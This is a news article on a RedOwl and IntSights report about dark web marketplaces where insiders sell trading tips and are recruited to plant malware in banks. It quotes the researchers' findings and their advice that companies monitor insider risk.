In May last year, an administrator of the Kick Ass Marketplace site going by the pseudonym "h3x" was interviewed by DeepDotWeb, claiming that his site had 15 investment firm members, 25 subscribers, 3 hackers and 2 trading analysts who observe financial markets and verify the integrity of stolen data before posting it to the website.
According to the new report "Monetizing the Insider: The Growing Symbiosis of Insiders and the Dark Web" [PDF] published Wednesday, Kick Ass Marketplace posts about five high confidence insider trading reports every week and makes some US $35,800 a week.
Researchers at RedOwl and IntSights also analyzed another dark web marketplace, "The Stock Insiders," which focuses on recruiting insiders, for example cashiers or other low-level retail staff who cash out stolen credit cards for resellable goods such as Apple iPhones.
"In one instance, a hacker solicited bank insiders to plant malware directly onto the bank’s network," says the researchers Ido Wulkan (IntSights), Tim Condello (RedOwl), David Pogemiller (RedOwl).
"This approach significantly reduces the cost of action as the hacker doesn’t have to conduct phishing exercises and can raise success rates by bypassing many of the organization’s technical defenses (e.g. anti-virus or sandboxing)."
The trio also found one hacker who was ready to pay an insider "7 figures on a weekly basis" for helping him gain access to a bank's computer.

Insider activity on dark web sites has doubled in the last year. It poses a real threat to both consumers and investors, and insider-driven incidents cause greater financial losses than attacks that originate outside the company.
RedOwl and IntSights suggest that corporations take the insider threat more seriously and use IT security systems to monitor employee activity carefully, without violating employees' privacy.